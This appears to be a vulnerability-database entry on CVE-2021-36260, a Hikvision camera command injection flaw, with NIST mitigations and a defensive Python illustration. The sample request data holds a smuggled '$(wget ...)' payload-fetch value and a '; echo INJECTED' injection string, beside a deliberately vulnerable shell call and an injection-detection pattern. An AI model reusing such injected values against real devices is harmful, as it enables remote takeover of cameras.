CVE-2021-36260
Published: 22 September 2021
Summary
CVE-2021-36260 is a critical-severity OS Command Injection (CWE-78) vulnerability in Hikvision DS-2CD2121G1-IDW firmware (one of the affected Hikvision products). Its CVSS base score is 9.8 (Critical).
Operationally, it ranks in the top 0.0% (that is, the very top) of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog; and a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Deeper analysis
A command injection vulnerability tracked as CVE-2021-36260 affects the web server component in certain Hikvision products. The flaw stems from insufficient input validation: request content is passed to an OS shell without being neutralised, so a specially crafted message can carry shell commands that the device executes (CWE-78). It carries a CVSS 3.1 base score of 9.8.
An unauthenticated attacker with network access to the web server can send crafted HTTP requests and execute arbitrary operating-system commands. Successful exploitation yields full confidentiality, integrity, and availability impact: remote code execution on the device, with no credentials and no user interaction required.
The official Hikvision security advisory lists affected firmware versions and provides remediation guidance, while public exploit code on Packet Storm and reports of widespread in-the-wild exploitation confirm active targeting of exposed devices.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2021-22880
Vulnerability details
A command injection vulnerability in the web server of some Hikvision products. Due to insufficient input validation, an attacker can exploit the vulnerability to launch a command injection attack by sending messages containing malicious commands.
- CWE(s): CWE-78 (OS Command Injection)
- KEV Date Added: 10 January 2022
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls (NIST 800-53 r5)
- SI-10 (Information Input Validation): requires validation of all input reaching the web server, so that request fields carrying shell metacharacters or command strings are rejected before they can trigger the CWE-78 injection.
- SI-2 (Flaw Remediation): mandates timely application of the Hikvision firmware updates listed in the vendor advisory, which remove the vulnerable web-server code path.
- CM-7 (Least Functionality): enforces least functionality on the device, disabling or restricting the web server's ability to invoke OS commands, so that even a missed validation cannot reach a shell.
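The following Python is an added illustration written for this page; it is not Hikvision code and not the public proof-of-concept. It models the CWE-78 pattern described above (a request field spliced into a command line that /bin/sh parses) beside the SI-10-style fix (positive allowlist validation plus an argv call with no shell), and it screens constructed request records for injection attempts, including URL-encoded ones. The handler, the `/example/...` endpoint paths, the field contents and the sample requests are hypothetical; `echo` stands in for whatever device-side helper a real handler would call.

```python
"""
Added example, not Hikvision code or the advisory's PoC. Models the CWE-78
pattern behind CVE-2021-36260 (a request field reaching /bin/sh) next to the
SI-10-style fix, and screens constructed request records for injection attempts.
The handler, endpoint paths, field contents and sample requests are hypothetical.
"""
import re
import subprocess
from urllib.parse import unquote

# Sequences that let a data value break out into a second shell command:
# command separators, pipes, backticks, $( ), and line breaks.
INJECTION_MARKERS = re.compile(r"[;|`\n\r]|\$\(|&&")

# Positive allowlist for a short identifier-like field: what the field MAY
# contain, rather than a denylist of what it may not.
ALLOWED_TOKEN = re.compile(r"[A-Za-z0-9_-]{1,32}")


def run_vulnerable(field: str) -> str:
    """Anti-pattern: the untrusted field is spliced into a command line that
    /bin/sh parses. 'echo' stands in for a device-side helper binary."""
    proc = subprocess.run(f"echo {field}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def validate_token(field: str) -> str:
    """SI-10 style check: reject anything outside the allowed character set."""
    if ALLOWED_TOKEN.fullmatch(field) is None:
        raise ValueError(f"rejected field {field!r}")
    return field


def run_hardened(field: str) -> str:
    """Validated value passed as one argv element with shell=False, so no shell
    ever parses it, even if the validation were later relaxed."""
    proc = subprocess.run(["echo", validate_token(field)],
                          capture_output=True, text=True)
    return proc.stdout


def hardened_rejects(field: str) -> bool:
    """True when the hardened path refuses the field instead of running it."""
    try:
        run_hardened(field)
    except ValueError:
        return True
    return False


def find_injection_candidates(requests):
    """Indices of request records whose URL-decoded body carries injection
    markers. Each record is (src_ip, method, path, body); decoding first
    defeats %3B-style encoding of ';'."""
    return [i for i, (_ip, _method, _path, body) in enumerate(requests)
            if INJECTION_MARKERS.search(unquote(body))]


# Constructed sample requests (hypothetical endpoints, not captured traffic).
SAMPLE_REQUESTS = [
    ("198.51.100.7", "PUT", "/example/setting", "<value>en</value>"),
    ("198.51.100.9", "PUT", "/example/setting",
     "<value>$(wget http://203.0.113.5/x -O /tmp/x)</value>"),
    ("198.51.100.9", "PUT", "/example/setting",
     "<value>en%3Becho%20INJECTED</value>"),
    ("198.51.100.12", "GET", "/example/status", ""),
]

if __name__ == "__main__":
    print(run_vulnerable("en; echo INJECTED"), end="")  # prints: en / INJECTED
    print(run_hardened("en"), end="")                    # prints: en
    print(hardened_rejects("en; echo INJECTED"))         # True
    print(find_injection_candidates(SAMPLE_REQUESTS))    # [1, 2]
```

The vulnerable path shows the whole problem in one line: the injected `; echo INJECTED` runs as a second command. The hardened path fixes it twice over, which is the point of pairing SI-10 with CM-7: the allowlist rejects the value, and even a value that slipped through would arrive as a single argv string that no shell interprets. The screening function is the detection-side counterpart, useful over web-server or proxy logs for exposed cameras; decode before matching, since encoded separators are the usual way such payloads evade naive pattern matching.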